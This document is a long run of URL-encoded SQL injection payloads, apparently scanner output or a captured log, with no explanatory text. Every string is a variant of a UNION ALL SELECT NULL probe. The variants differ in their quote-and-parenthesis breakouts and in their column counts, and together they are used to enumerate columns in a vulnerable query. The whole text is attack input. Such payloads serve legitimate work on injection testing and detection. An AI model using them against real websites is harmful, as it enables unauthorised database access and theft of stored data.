1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 